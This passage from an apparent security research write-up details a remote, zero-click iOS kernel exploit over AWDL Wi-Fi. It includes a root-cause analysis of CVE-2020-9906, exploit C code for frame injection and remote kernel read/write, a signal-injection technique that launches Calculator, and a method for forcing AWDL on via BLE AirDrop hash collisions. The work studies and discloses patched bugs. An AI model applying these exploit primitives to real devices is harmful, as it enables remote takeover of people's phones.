added_to_fw_cache is a name I have given to the flag field at +0x4b8 in IO80211AWDLPeer. We can see that if a peer with that flag set is destructed then the peer manager will call the steering_manager's resetAndRemovePeerInfo method shown above.


resetAndRemovePeerInfo clears that flag then iterates through the steering context object's array of currently-being-steered peer MAC addresses. If the MAC address of the peer being destructed is found in there, that entry is memset to 0.


The logic already looks a little odd; they decrement peer_count but don't shrink the size of the array by swapping the empty slot with the last valid entry, meaning it will only work correctly if the peers are destructed in the exact reverse order that they were added. Kinda weird, but probably not a security vulnerability.


The logic of this function means peer_count will be decremented each time it runs. But what would happen if this function were called more times than the initial value of peer_count? In the first extra invocation the memcmp loop wouldn't execute and peer_count would be decremented from 0 to 0xffffffff, but in the second extra invocation, the peer_count is non-zero, so it would enter the memcmp/memset loop. But the only loop termination condition is i >= peer_count, so this loop will try to run 4 billion times, certainly going off the end of the 8 entry peer_macs array:


struct __attribute__((packed)) BssSteeringCntx {

/* +0x0000 */  uint32_t first_field;

/* +0x0004 */  uint32_t service_type;

/* +0x0008 */  uint32_t peer_count;

/* +0x000C */  uint32_t role;

/* +0x0010 */  struct ether_addr peer_macs[8];

/* +0x0040 */  struct ether_addr infraBSSID;

/* +0x0046 */  uint8_t pad4[6];

/* +0x004C */  uint32_t infra_channel_from_datapath_tlv;

/* +0x0050 */  uint8_t pad8[8];

/* +0x0058 */  char ssid[32];

/* +0x0078 */  uint8_t pad1[12];

/* +0x0084 */  uint32_t num_peers_added_to_umi;

/* +0x0088 */  uint8_t pad_10;

/* +0x0089 */  uint8_t pendingTransitionToNewState;

/* +0x008A */  uint8_t pad7[2];

/* +0x008C */  enum BSSSteeringState current_state;

/* +0x0090 */  uint8_t pad5[8];

/* +0x0098 */  struct IOTimerEventSource *bssSteeringExpiryTimer;

/* +0x00A0 */  struct IOTimerEventSource *bssSteeringStageExpiryTimer;

/* +0x00A8 */  uint8_t pad9[8];

/* +0x00B0 */  uint32_t steering_policy;

/* +0x00B4 */  uint8_t inProgress;

};

My reverse engineered version of the BSS Steering context object. I've managed to name most of the fields.


This is only a vulnerability if it's possible to call this function peer_count+2 times. (To decrement peer_count down to 0, then set it to -1, then re-enter with peer_count = -1.)


Whether or not resetAndRemovePeerInfo is called when a peer is destructed depends only on whether that peer has the added_to_fw_cache flag set; this gives us an inequality: for safety, the number of peers with added_to_fw_cache set must be less than or equal to peer_count+1. Probably it's really meant to be the case that peer_count should be equal to the number of peers with that flag set. Is that the case?


No, it's not. After steering fails we restart the BSS Steering state machine by sending a new BSSSteering TLV with a steeringMsgID of 6 rather than 0; this means the steering state machine gets a BSS_STEERING_REMOTE_STEERING_TRIGGER event rather than the BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD which was used to start it. This resets the steering context object, filling the peer_macs array with whatever new peer macs we specify in the new DIRECTED_STEERING_CMD TLV. If we specify different peers to those already in the context's peer_macs array, then those old entries' corresponding IO80211AWDLPeer objects don't have their added_to_fw_cache field cleared, but the new peers do get that flag set.


This means that the number of peers with the flags set becomes greater than context->peer_count, so as the peers eventually get destructed peer_count goes down to zero, underflows then causes memory corruption.


I was hitting this condition each time I restarted steering, though it would take some time for the device to actually kernel panic because the steered peers needed to timeout and get destructed.


Root causing this second bonus remotely-triggerable iOS kernel memory corruption was much harder than the first bonus double-free; the explanation given above took a few days' work. It was necessary though, as I had to work around both of these vulnerabilities to ensure I didn't accidentally trigger them, which in total added a significant amount of extra work.


The work-around in this case was to ensure that I only ever restarted steering the same peers; with that change we no longer hit the peer_count underflow and only corrupt the memory we're trying to corrupt! This issue was fixed in iOS 13.6 as CVE-2020-9906.


The target is no longer randomly kernel panicking even when we don't trigger the intended Sync Tree heap overflow, so let's get back to the exploit.

Add to read

We have an arbitrary add primitive but it's not quite an arbitrary write yet. For that, we need to know the original values at the target address so we can compute, byte by byte, the frame sizes required to roll each byte over to the value we actually want to write.
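
To make the byte-by-byte idea concrete, here's an illustrative sketch. It assumes we already have some way to read the original byte, and it ignores both the minimum frame length and carries into neighbouring bytes, both of which the real exploit has to deal with:

#include <stdint.h>

uint8_t read_byte(uint64_t kaddr);                       // hypothetical: some read primitive
void    arbitrary_add(uint64_t target, uint32_t value);  // the add built above (simplified signature)

// Roll the byte at kaddr over to `desired` using only the add primitive.
void write_byte_via_add(uint64_t kaddr, uint8_t desired) {
  uint8_t original = read_byte(kaddr);
  uint32_t delta = (uint32_t)((uint8_t)(desired - original));  // wrap within the byte
  if (delta != 0) {
    arbitrary_add(kaddr, delta);
  }
}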


Probably we'll have to use the arbitrary add to corrupt something in a peer or the peer manager such that we can get it to follow an arbitrary pointer when building an MI or PSF frame which will be sent over the air.


I went back to IDA and spent a long time looking through code to search for such a primitive, and found one in the construction of the Service Request Descriptor TLVs in MI frames:


IO80211AWDLPeerManager::buildMasterIndicationTemplate

  (char *buffer, u32 total_size ...

...

  req_desc = this->req_desc;

  if ( req_desc ){

    desc_len = req_desc->desc_len;        // length

    desc_ptr = req_desc->desc_ptr;

    tlv_len = desc_len+4;

    if (desc_len && desc_ptr && tlv_len < remaining) {

      buffer[offset] = 16; // type

      *(u16*)&buffer[offset+1] = desc_len + 1; // len

      buffer[offset+3] = 3;

      IO80211ServiceRequestDescriptor::copyDataOnly(

        req_desc,

        &buffer[offset+4],

        total_size - offset - 4);

    }


This is reading an IO80211ServiceRequestDescriptor object pointer from the peer manager, from which it reads another pointer and a length. If there's space in the MI frame for that length of buffer then it calls the RequestDescriptor's copyDataOnly method, which simply copies from the RequestDescriptor into the MI frame template. It only reads the pointer and length fields, which are at offsets +0x40 and +0x54 in the request descriptor, so by pointing the IO80211AWDLPeerManager's req_desc pointer to data we control we can cause the next MI template which is generated to contain data read from an arbitrary address, this time with no restrictions on the data being read.


We can use the limited read primitive we currently have to read the existing value of the req_desc pointer; we just need to find somewhere below it in the peer_manager object where we know there will always be a fixed, small dword we can use as the length value needed for the read. Indeed, a few bytes below it there is such a value.


The first trick is in choosing somewhere to point the req_desc pointer to. We want to choose somewhere where we can easily update the read target without having to trigger the memory corruption. From reading the TLV parsing code I knew there were some TLVs which have very little processing. A good example, and the one I chose to use, is the NSync TLV. The only processing is to check that the total TLV length including the header is less than or equal to 0x40. That entire TLV is then memcpy'ed into a 0x40 byte buffer in the peer object at offset +0x4c4:


memcpy(this->nsync_tlv_buf, tlv_ptr, tlv_total_len);


We can use the arbitrary write to point the peer_manager's req_desc pointer to just below the lower_peer's nsync_tlv buffer such that by spoofing NSync TLVs from lower_peer we can update the fake descriptor pointer and length values.


Some care needs to be taken when corrupting the req_desc pointer however as we can currently only do byte-by-byte writes and the req_desc pointer might be read while we are corrupting it. We therefore need a way to stop those reads.


IO80211AWDLPeerManager::updateBroadcastMI is on the critical path for the read, meaning that every time the MI frame is updated it must go through this function, which contains the following check:


if (this->frames_outstanding <= this->frames_limit) {

  IO80211AWDLPeerManager::updatePrimaryPayloadMI(...


frames_limit is initialized to a fixed value of 3. If we first use the arbitrary add to make frames_outstanding very large, this check will fail and the MI template won't be updated, and the req_desc member won't be read. Then after we're done corrupting the req_desc pointer we can set this value back to its original value and the MI templates will be updated again and the arbitrary read will work.


An easy way to do this is to add 0x80 to the most-significant byte of frames_outstanding. The first time we do this it will make frames_outstanding very large. If it were 2 to begin with it would go from: 0x00000002 to 0x80000002.


Adding 0x80 to that MSB a second time would cause it to overflow back to 0, resetting the value to 2 again. This of course has the side effect of adding 1 to the next dword field in the peer_manager when it overflows, but fortunately this doesn't cause any problems.
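
Sketched as code, the toggle is a single helper. FRAMES_OUTSTANDING_MSB_ADDR is a stand-in for the kernel address of that most-significant byte, and arbitrary_add is the primitive built earlier:

#include <stdint.h>

void arbitrary_add(uint64_t target, uint32_t value);  // the add primitive from earlier (simplified signature)

// Hypothetical: kernel address of the most-significant byte of
// peer_manager->frames_outstanding on the target.
extern uint64_t FRAMES_OUTSTANDING_MSB_ADDR;

// Calling this once makes frames_outstanding enormous (0x00000002 -> 0x80000002),
// pausing MI template updates; calling it a second time wraps the byte back
// (0x80000002 -> 0x00000002, with a carry into the next field), resuming them.
void toggle_mi_updates(void) {
  arbitrary_add(FRAMES_OUTSTANDING_MSB_ADDR, 0x80);
}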


Now, by spoofing an NSync TLV from lower_peer and monitoring for a change in the contents of the 0x10 TLV sent by the target in MI frames, we can read kernel memory from arbitrary addresses.

Speedy reader

We now have a truly arbitrary read, but unfortunately it can be a bit slow. Sometimes it takes a few seconds for the MI template to be updated. What we need is a way to force the MI template to be regenerated on demand.


Looking through the cross references to IO80211AWDLPeerManager::updateBroadcastMI I noticed that it seems the MI template gets regenerated each time the peer bloom filter gets updated in IO80211AWDLPeerManager::updatePeerListBloomFilter. As we saw much earlier in this post, and I had determined months before this point, the bloom filter code isn't used. But... we have an arbitrary add so we could just turn it on!


Indeed, by flipping the flag at +0x5950 in the IO80211AWDLPeerManager we can enable the peer bloom filter code.


With peer bloom filters enabled each time the target sees a new peer, it regenerates the MI template in order to ensure it's broadcasting an up-to-date bloom filter containing all the peers it knows about (or at least the first 256 in the peer list.) This means we can make our arbitrary read much much faster: we just need to send the correct NSync TLV containing our read target then spoof a new peer and wait for an updated MI. With this technique complete we can read arbitrary remote kernel memory over the air at a rate of many kilobytes per second.
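
Sketching the resulting fast read loop (every helper here is a stand-in for the exploit's real frame-building and sniffing code):

#include <stdint.h>
#include <stddef.h>

// Hypothetical helpers: update the fake descriptor via lower_peer's NSync TLV,
// spoof a frame from a previously-unseen MAC, and wait for the next MI frame's
// type 0x10 TLV to show up on the monitor interface.
void  spoof_nsync_read_target(uint64_t kaddr, uint32_t len);
void  spoof_frame_from_new_peer(void);
void* wait_for_mi_tlv_0x10(size_t* out_len);

void* rkbuf(uint64_t kaddr, uint32_t len) {
  spoof_nsync_read_target(kaddr, len);   // point the fake req_desc at the target
  spoof_frame_from_new_peer();           // new peer -> bloom filter update -> MI regenerated
  size_t got = 0;
  return wait_for_mi_tlv_0x10(&got);     // the leaked kernel bytes come back in the 0x10 TLV
}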

Remote kernel memory read/write API

At this point we can build the typical abstraction layer used by a local privilege escalation exploit, except this time it's remote.


The main kernel memory read function is:


void* rkbuf(uint64_t kaddr, uint32_t len);


With some helpers to make the code simpler:


uint64_t rk64(uint64_t kaddr);

uint32_t rk32(uint64_t kaddr);

uint8_t rk8(uint64_t kaddr);


Similarly for writing kernel memory, we have the main write method:


void wk8(uint64_t kaddr, uint8_t desired_byte);


and some helpers:


void wkbuf(uint64_t kaddr, uint8_t* desired_value, uint32_t len);

void wk64(uint64_t kaddr, uint64_t desired_value);

void wk32(uint64_t kaddr, uint32_t desired_value);
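
The wider write helpers can simply be layered on top of the byte-granularity wk8. A minimal sketch of that layering (my own illustration, not necessarily how the released exploit implements it):

#include <stdint.h>

void wk8(uint64_t kaddr, uint8_t desired_byte);  // the underlying primitive

void wkbuf(uint64_t kaddr, uint8_t* desired_value, uint32_t len) {
  for (uint32_t i = 0; i < len; i++) {
    wk8(kaddr + i, desired_value[i]);
  }
}

void wk64(uint64_t kaddr, uint64_t desired_value) {
  wkbuf(kaddr, (uint8_t*)&desired_value, sizeof(desired_value));
}

void wk32(uint64_t kaddr, uint32_t desired_value) {
  wkbuf(kaddr, (uint8_t*)&desired_value, sizeof(desired_value));
}

Each wk8 is itself a multi-frame dance over the air, which is why the batching optimization described later in the "Speedy writer" section matters.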


From this point the exploit code starts to look a lot more like a regular local privilege escalation exploit and the remote aspect is almost completely abstracted away.

Popping calc with 15 bytes

This is already enough to pop calc. To do this we just need a way to inject a control flow edge into userspace somehow. A bit of grepping through the XNU code and I stumbled across the code handling BSD signal delivery which seemed promising.


Each process structure has an array of signal handlers; one per signal number.


struct sigacts {

  user_addr_t ps_sigact[NSIG];   /* disposition of signals */

  user_addr_t ps_trampact[NSIG]; /* disposition of signals */

  ...


The ps_trampact array contains userspace function pointers. When the kernel wants a userspace process to handle a signal it looks up the signal number in that array:


  trampact = ps->ps_trampact[sig];


then sets the userspace thread's pc value to that:


  sendsig_set_thread_state64(

    &ts.ts64.ss,

    catcher,

    infostyle,

    sig,

    (user64_addr_t)&((struct user_sigframe64*)sp)->sinfo,

    (user64_addr_t)p_uctx,

    token,

    trampact,

    sp,

    th_act)


Where sendsig_set_thread_state64 looks like this:


static kern_return_t

sendsig_set_thread_state64(arm_thread_state64_t *regs,

                           user64_addr_t catcher,

                           int infostyle,

                           int sig,

                           user64_addr_t p_sinfo,

                           user64_addr_t p_uctx,

                           user64_addr_t token,

                           user64_addr_t trampact,

                           user64_addr_t sp,

                           thread_t th_act) {

  regs->x[0] = catcher;

  regs->x[1] = infostyle;

  regs->x[2] = sig;

  regs->x[3] = p_sinfo;

  regs->x[4] = p_uctx;

  regs->x[5] = token;

  regs->pc = trampact;

  regs->cpsr = PSR64_USER64_DEFAULT;

  regs->sp = sp;

 

  return thread_setstatus(th_act,

                          ARM_THREAD_STATE64,

                          (void *)regs,

                          ARM_THREAD_STATE64_COUNT);

}


The catcher value in X0 is also completely controlled, read from the ps_sigact array.


Note that the kernel APIs for setting userspace register values don't require userspace pointer authentication codes.


We can set X0 to the constant CFString "com.apple.calculator" already present in the dyld_shared_cache. On 13.3 on the 11 Pro this is at 0x1BF452778 in an unslid shared cache.


We set PC to this gadget in CommunicationSetupUI.framework:


MOV  W1, #0

BL   _SBSLaunchApplicationWithIdentifier


This clears W1 then calls SBSLaunchApplicationWithIdentifier, a Springboard Services Framework private API for launching apps.


The final piece of this puzzle is finding a process to inject the fake signal into. It needs to have the com.apple.springboard.launchapplications entitlement in order for Springboard to process the launch request. Using Jonathan Levin's entitlement database it's easy to find the list of injection candidates.


We remotely traverse the linked list of running processes looking for a victim, set a fake signal handler then make a thread in that process believe it has to handle a signal by OR'ing in the correct signal number in the uthread's siglist bitmap of pending signals:


wk8(uthread+0x10c+3, 0x40); // uthread->siglist


and finally making the thread believe it needs to handle a BSD AST:


wk8_no_retry(thread+0x2e8, 0x80); // thread->act |= AST_BSD


Now, when this thread gets scheduled and tries to handling pending ASTs, it will try to handle our fake signal and a calculator will appear:


An iPhone 11 Pro running Calculator.app with a monitor in the background displaying the output from the final stage of the AWDL exploit

Improving the bootstrap BSS steering read

We've popped calc, we're done! Or are we? It's kinda slow, and there's no real reason for it to be so slow. We managed to build quite a fast arbitrary read primitive so that's not the bottleneck. The major bottleneck at the moment is the initial BSS Steering-based read. It's taking 8 seconds per read because it needs the state machine to time out between each attempt.


As we saw, however, the BSS Steering TLV indicates that we should be able to steer up to 8 peers at the same time, meaning that we should be able to improve our read speed by at least 8x. In fact, if we can get away with 8 or fewer initial reads our read speed could be much faster than that.


However, when you try to steer 8 peers simultaneously, it doesn't quite work as expected:


When multiple peers are steered the UMIs flood the airwaves. In this example I was steering 8 peers but the frames are dominated by UMIs to the first peer. You can see a handful of UMIs to :06, and one to :02 amongst the dozens to :00.


Testing against MacOS we also see the following log message:


Peer 22:22:aa:22:00:00 DID NOT ack our UMI


When the target tries to steer 8 peers at the same time it starts flooding the airwaves with UMI frames directed at the target peers - so many in fact that it never actually manages to send the UMIs for all 8 steering targets before timing out.


We've already covered how to stall the initial sending of UMIs by controlling the channel sequence, but it looks like we're also going to have to ACK the UMI frames.

ACK a MAC?

As we saw earlier, ACKs in 802.11a and g are timing based. To ACK a frame you have to send the ACK in the short window following the transmission of the frame. We definitely can't do that using libpcap; the timing needs microsecond precision. We probably can't even do that with a custom kernel driver.


There is however an obscure WiFi adaptor monitor mode feature called "Active Monitor Mode", supported by very few chipsets.


Active monitor mode allows you to inject and monitor arbitrary frames as usual, except in active monitor mode (as opposed to regular monitor mode) the adaptor will still ACK frames if they're being sent to its MAC address.


The Mediatek MT76 chipset was the only one I could find with a USB adaptor that supports this feature. I bought a bunch of MT76-based adaptors and the only one where I could actually get this feature to work was the ZyXEL NWD6605 which uses an mt76x2u chipset.


The only issue was that I could only get Active Monitor Mode to actually work when running at 12 Mbps on a 5GHz channel but my current setup was using adaptors which were not capable of 5GHz injection.

Moving to 5GHz

I had tried right back at the beginning of the exploit development process to get 5GHz injection and monitoring to work; after trying for a week with lots of adaptors and building many, many branches of kernel drivers and fiddling with radiotap headers I had given up and decided to focus on getting something working on 2.4GHz with my old adaptors.


This time around I just bought all the adaptors I could find which looked like they might have even the remotest possibility of working and tried again.


One of the challenges is that OEMs won't consistently use the same chipset or revision of chipset in a device, which means getting hold of a particular chipset and revision can be a hit-and-miss process.


Here are all the adaptors which I used during this exploit to try to find support for the features I wanted:


All the WiFi adaptors tested during this exploit development process, from top left to bottom right: D-Link DWA-125, Netgear WG111-v2, Netgear A6210, ZyXEL NWD6605, ASUS USB-AC56, D-Link DWA-171, Vivanco 36665, tp-link Archer T1U, Microsoft Xbox wireless adaptor Model 1790, Edimax EW-7722UTn V2, FRITZ!WLAN AC430M, ASUS USB-AC68, tp-link AC1300


In the end I required two different adaptors to get the features I wanted:


Active monitor mode and frame injection: ZyXEL NWD6605 using mt76x2u driver


Monitor mode (including management and ACK frames): Netgear A6210 using rtl8812au driver


With this setup I was able to get frame injection, monitor mode sniffing of all frames including management and ACK frames as well as Active monitor mode to work at 12 Mbps on channel 44.

Working with Active Monitor Mode

You can enable the feature like this:


ip link set dev wlan1 down

iw dev wlan1 set type monitor

iw dev wlan1 set monitor active control otherbss

ip link set dev wlan1 up

iw dev wlan1 set channel 44


We can change the card's MAC address using the ip tool like this:


ip link set dev wlan1 down

ip link set wlan1 address 44:44:22:22:22:22

ip link set dev wlan1 up


Changing the MAC address like this takes at least a second and the interface has to be down. Since we're trying to make these reads as fast as possible I decided to take a look at how this mac address changing actually worked to see if I could speed it up...


Three ways to set a MAC: 1 - ioctl

The old way to set a network device MAC address is to use the SIOCSIFHWADDR ioctl:


struct ifreq ifr = {0};

uint8_t mac[6] = {0x22, 0x23, 0x24, 0x00, 0x00, 0x00};

memcpy(&ifr.ifr_hwaddr.sa_data[0], mac, 6);

int s = socket(AF_INET, SOCK_DGRAM, 0);

strcpy(ifr.ifr_name, "wlan1");

ifr.ifr_hwaddr.sa_family = ARPHRD_ETHER;

int ret = ioctl(s, SIOCSIFHWADDR, &ifr);

printf("ioctl retval: %d\n", ret);


This interface is deprecated and doesn't work at all for this driver.


Three ways to set a MAC: 2 - netlink

The current supported interface is netlink. It took a whole day to learn enough about netlink to write a standalone PoC to change a MAC address. Netlink is presumably very powerful but also quite obtuse. And even after all that (perhaps unsurprisingly) it's no faster than the command line tool which is really just making these same netlink API calls too.


Check out change_mac_nl.c in the released exploit source code to see the netlink code.


Three ways to set a MAC: 3 - hacker

Trying to do this the supported way has failed; it's just way too slow. But thinking about it, what is the MAC anyway? It's almost certainly just some field stored in flash or RAM on the chipset, and indeed, diving into the mt76x2u linux kernel driver source and tracing the functions which set the MAC address, we can see that it ends up writing to some configuration registers on the chip:


#define MT_MAC_ADDR_DW0 0x1008

#define MT_MAC_ADDR_DW1 0x100c

 

void mt76x02_mac_setaddr(struct mt76x02_dev *dev, const u8 *addr)

{

  static const u8 null_addr[ETH_ALEN] = {};

  int i;

 

  ether_addr_copy(dev->mt76.macaddr, addr);

 

  if (!is_valid_ether_addr(dev->mt76.macaddr)) {

    eth_random_addr(dev->mt76.macaddr);

    dev_info(dev->mt76.dev,

             "Invalid MAC address, using random address %pM\n",

             dev->mt76.macaddr);

  }

 

  mt76_wr(dev,

          MT_MAC_ADDR_DW0,

          get_unaligned_le32(dev->mt76.macaddr));

 

  mt76_wr(dev,

          MT_MAC_ADDR_DW1,

          get_unaligned_le16(dev->mt76.macaddr + 4) |

            FIELD_PREP(MT_MAC_ADDR_DW1_U2ME_MASK, 0xff));

   ...


I wonder if I could just write directly to those configuration registers? Would it completely blow up? Or would it just work? Is there an easy way to do this or will I have to patch the driver?


Looking around the driver a bit we can see it has a debugfs interface. Debugfs is a very neat way for drivers to easily expose lots of internal stuff out to userspace, restricted to root, for logging and monitoring as well as for messing around with:


/sys/kernel/debug/ieee80211/phy7/mt76# ls

agc  ampdu_stat  dfs_stats  edcca  eeprom  led_pin  queues  rate_txpower  regidx  regval  temperature  tpc  tx_hang_reset  txpower


What we're after is a way to write to arbitrary control registers, and these two debugfs files let you do exactly that:


# cat regidx

0

# cat regval

0x76120044


If you write the address of the configuration register you want to read or write to the regidx file as a decimal value then reading or writing the regval file lets you read or write that configuration register as a 32-bit hexadecimal value. Note that exposing configuration registers this way is a feature of this particular driver's debugfs interface, not a generic feature of debugfs. With this we can completely skip the netlink interface and the requirement to bring the device down and instead directly manipulate the internal state of the adaptor.


I replace the netlink code with this:


void mt76_debugfs_change_mac(char* phy_str, struct ether_addr new_mac) {

    union mac_dwords {

      struct ether_addr new_mac;

      uint32_t dwords[2];

    } data = {0};

 

    data.new_mac = new_mac;

 

    char lower_dword_hex_str[16] = {0};

    snprintf(lower_dword_hex_str, 16, "0x%08x\n", data.dwords[0]);

 

    char upper_dword_hex_str[16] = {0};

    snprintf(upper_dword_hex_str, 16, "0x%08x\n", data.dwords[1]);

 

    char* regidx_path = NULL;

    asprintf(&regidx_path,

             "/sys/kernel/debug/ieee80211/%s/mt76/regidx",

             phy_str);

 

    char* regval_path = NULL;

    asprintf(&regval_path,

             "/sys/kernel/debug/ieee80211/%s/mt76/regval",

             phy_str);

 

    file_write_string(regidx_path, "4104\n");

    file_write_string(regval_path, lower_dword_hex_str);

 

    file_write_string(regidx_path, "4108\n");

    file_write_string(regval_path, upper_dword_hex_str);

 

    free(regidx_path);

    free(regval_path);   

}


and... it works! The adaptor instantly starts ACKing frames sent to whichever MAC address we write into the MAC address field in the adaptor's configuration registers.


All that's then required is a rewrite of the early read code:


Now it starts out steering 8 stalled peers. Each time a read is requested, if there's still time left before steering times out and there are still stalled peers, one stalled peer is chosen, has its steering_msg_blob pointer corrupted with the read target and gets unstalled. The target will start sending UMIs to that peer, we set the correct MAC address on the active monitor device, sniff the UMI and ACK it to stop the peer sending more. From the UMI we extract the value from TLV 0x1d and get the disclosed kernel memory.


If there are no more stalled peers, or steering has timed out, we wait a safe amount of time until we're able to restart all 8 peers and start again:


struct ether_addr reader_peers[8];

 

struct early_read_params {

    struct ether_addr dst;

    char* phy_str;

} er_para;

 

void init_early_read(struct ether_addr dst, char* phy_str) {

  er_para.dst = dst;

  er_para.phy_str = phy_str;

 

  reader_peers[0] = *(ether_aton("22:22:aa:22:00:00"));

  reader_peers[1] = *(ether_aton("22:22:aa:22:00:01"));

  reader_peers[2] = *(ether_aton("22:22:aa:22:00:02"));

  reader_peers[3] = *(ether_aton("22:22:aa:22:00:03"));

  reader_peers[4] = *(ether_aton("22:22:aa:22:00:04"));

  reader_peers[5] = *(ether_aton("22:22:aa:22:00:05"));

  reader_peers[6] = *(ether_aton("22:22:aa:22:00:06"));

  reader_peers[7] = *(ether_aton("22:22:aa:22:00:07"));

}

 

// state required between early reads:

uint64_t steering_begin_timestamp = 0;

int n_steered_peers = 0;

 

void* try_early_read(uint64_t kaddr, size_t* out_size) {

  struct ether_addr peer_b = *(ether_aton("22:22:bb:22:00:00"));

  int n_peers = 8;

  struct ether_addr reader_peer;

  int should_restart_steering = 0;

 

  // what phase are we in?

 

  uint64_t milliseconds_since_last_steering =

    (now_nanoseconds() - steering_begin_timestamp) /

    (1ULL*1000ULL*1000ULL);

  

  if (milliseconds_since_last_steering < 5000 &&

      n_steered_peers < 8) {

    // if less than 5 seconds have elapsed since we started steering

    // and we haven't reached the peer limit, then steer the next peer

 

    reader_peer = reader_peers[n_steered_peers++];

 

  } else if (milliseconds_since_last_steering < 8000) {

    // wait for the steering machine to timeout so we can restart it

    usleep((8000 - milliseconds_since_last_steering) * 1000);

    should_restart_steering = 1;

  } else {

    // more than 8 seconds have already elapsed since we last

    // started steering (or we've never started it) so restart

    should_restart_steering = 1;

  }

 

  if (should_restart_steering) {

    // make reader peers suitable for bss steering

    n_steered_peers = 0;

 

    for (int i = 0; i < n_peers; i++) {

      inject(RT(),

          WIFI(er_para.dst, reader_peers[i]),

          AWDL(),

          SYNC_PARAMS(),

          CHAN_SEQ_EMPTY(),

          HT_CAPS(),

          UNICAST_DATAPATH(0x1307 | 0x800),

          PKT_END());

    }

 

    inject(RT(),

           WIFI(er_para.dst, peer_b),

           AWDL(),

           SYNC_PARAMS(),

           HT_CAPS(),

           UNICAST_DATAPATH(0x1307),

           BSS_STEERING_0(reader_peers, n_peers),

           PKT_END());

 

    steering_begin_timestamp = now_nanoseconds();

    reader_peer = reader_peers[n_steered_peers++];

  }

 

  char overflower[128] = {0};

  *(uint64_t*)(&overflower[0x50]) = kaddr;

 

  // set the card's MAC to ACK the UMI from the target

  mt76_debugfs_change_mac(er_para.phy_str, reader_peer);

 

  inject(RT(),

      WIFI(er_para.dst, reader_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      HT_CAPS(),

      DATAPATH(reader_peer),

      SYNC_TREE((struct ether_addr*)overflower,

                sizeof(overflower)/sizeof(struct ether_addr)),

      PKT_END());

 

  // try to receive a UMI:

  void* steering_tlv = try_get_TLV(0x1d);

 

  if (steering_tlv) {

    struct mini_tlv {

      uint8_t type;

      uint16_t len;

    } __attribute__((packed));

    *out_size = ((struct mini_tlv*)steering_tlv)->len+3;

  } else {

    printf("didn't get TLV\n");

  }

 

  // NULL out the bsssteering blob

  char null_overflower [128] = {0};

  inject(RT(),

      WIFI(er_para.dst, reader_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      HT_CAPS(),

      DATAPATH(reader_peer),

      SYNC_TREE((struct ether_addr*)null_overflower,

                sizeof(null_overflower)/sizeof(struct ether_addr)),

      PKT_END());

 

  // the active monitor interface doesn't always manage to ACK

  // the first frame, give it a chance

  usleep(1*1000);

 

  return steering_tlv;

}

Demo

With some luck we can bootstrap the faster read primitive with 8 or fewer early reads which means on an iPhone 11 Pro with AWDL enabled popping calc now looks like this:


In this demo AWDL has been manually enabled by opening the sharing panel in the Photos app. This keeps the AWDL interface active. The exploit gains arbitrary kernel memory read and write within a few seconds and is able to inject a signal into a userspace process to cause it to JOP to a single gadget which opens Calculator.app

Zero clicks

I mentioned that AWDL has to be enabled; it isn't always on. In order to make this an interactionless zero-click exploit which can target any device in radio proximity we therefore need a way to force devices to enable their AWDL interface.


AWDL is used for many things. For example, my iPhone seems to turn on AWDL when it receives a voicemail because it really wants to AirPlay the voicemail to my Apple TV. But sending someone a voicemail requires their phone number, and we're looking for an attack which requires no identifiers or non-default settings.


The second research paper from the SEEMOO labs team demonstrated an attack to enable AWDL using Bluetooth low energy advertisements to force arbitrary devices in radio proximity to enable their AWDL interfaces for Airdrop. SEEMOO didn't publish their code for this attack so I decided to recreate it myself.

Enabling AWDL

In the iOS Photos app, when you select the sharing dialog and click "AirDrop", a list of iOS and MacOS devices nearby appears, all of which you can send your photo to. Most people don't want random passers-by sending them unsolicited photos so the default AirDrop sharing setting is "Contacts Only", meaning you will only see AirDrop sharing requests from users in your contacts book. But how does this work? For an in-depth discussion, check out the SEEMOO labs paper.


When a device wants to share a file via AirDrop it starts broadcasting Bluetooth Low Energy advertisements which look like this example, broadcast by MacOS:


[PACKET] [ CH:37|CLK:1591031840.920892|RSSI:-44dBm ] << BLE - Advertisement Packet | type=ADV_IND | addr=28:C4:72:91:05:D7 | data=02010617ff4c000512000000000000000001297f247ee56f62b300 >>


BLE advertisements are small; they have a maximum payload size of 31 bytes. The bundle of bytes at the end is actually four truncated 2-byte SHA256 hashes of the contact information of the device which is trying to share something. The contact information used is the email addresses and phone numbers associated with the device's logged-in iCloud account. You can generate the same truncated hashes like this:


In this case I'm using a test account with the iCloud email address: '[email protected]'


>>> import hashlib

>>> s = '[email protected]'

>>> hashlib.sha256(s.encode('utf-8')).hexdigest()[:4] 

'62b3'


Notice that this matches the two penultimate bytes in the advertisement frame shown above. The contact hashes are unsalted which can have some fun consequences if you live in a country with localized mobile phone numbers, but this is an understandable performance optimization.


All iOS devices are constantly receiving and processing BLE advertisement frames like this. In the case of these AirDrop advertisements, when the device is in the default "Contacts Only" mode, sharingd (which parses BLE advertisements) checks whether this unsalted, truncated hash matches the truncated hashes of any emails or phone numbers in the device's address book.


If a match is found this doesn't actually mean the sending device really is in the receiver's address book, just that there is a contact with a colliding hash. In order to resolve this the devices need to share more information and at this point the receiver enables AWDL to establish a higher-bandwidth communication channel.


The SEEMOO labs paper continues in great detail about how the two devices then really verify that the sender is in the receiver's address book, but we are only trying to get AWDL enabled so we're done. As long as we keep broadcasting the advertisement with the colliding hash the target's AWDL interface will remain active.

Blue in the teeth

The SEEMOO labs team paper discusses the custom firmware they wrote for a BBC micro:bit so I picked up a couple of those:


The BBC micro:bit is an education-focused dev board. This photo shows the rear of the board; the front has a 5x5 LED matrix and two buttons. They cost under $20.


These devices are intended for the education/maker market. It's a Nordic nRF51822 SOC with a Freescale KL26 acting as a USB programmer for the nRF51. BBC provide a small programming environment for it, but you can build any firmware image for the nRF51, plug in the micro:bit which appears as a mass-storage device thanks to the KL26 and drag and drop the firmware image on there. The programmer chip flashes the nRF51 for you and you can run your code. This is the device which the SEEMOO labs team used and wrote a custom firmware for.


Whilst playing around with the micro:bit I discovered the MIRAGE project, a generic and amazingly well documented project for doing all manner of radio security research. Their tools have a firmware for the micro:bit, and indeed, dropping their provided firmware image on to the micro:bit and running this:


sudo ./mirage_launcher ble_sniff SNIFFING_MODE=advertisements INTERFACE=microbit0


we're able to start sniffing BLE advertisements:


[PACKET] [ CH:37|CLK:1591006615.511192|RSSI:-46dBm ] << BLE - Advertisement Packet | type=ADV_IND | addr=58:6A:80:4F:41:74 | data=02011a020a0707ff4c000f020000 >>


Indeed, if you do this at home you'll likely see a barrage of BLE traffic from everything imaginable. Apple devices are particularly chatty; notice the frames sent each time your AirPods case is opened and closed.


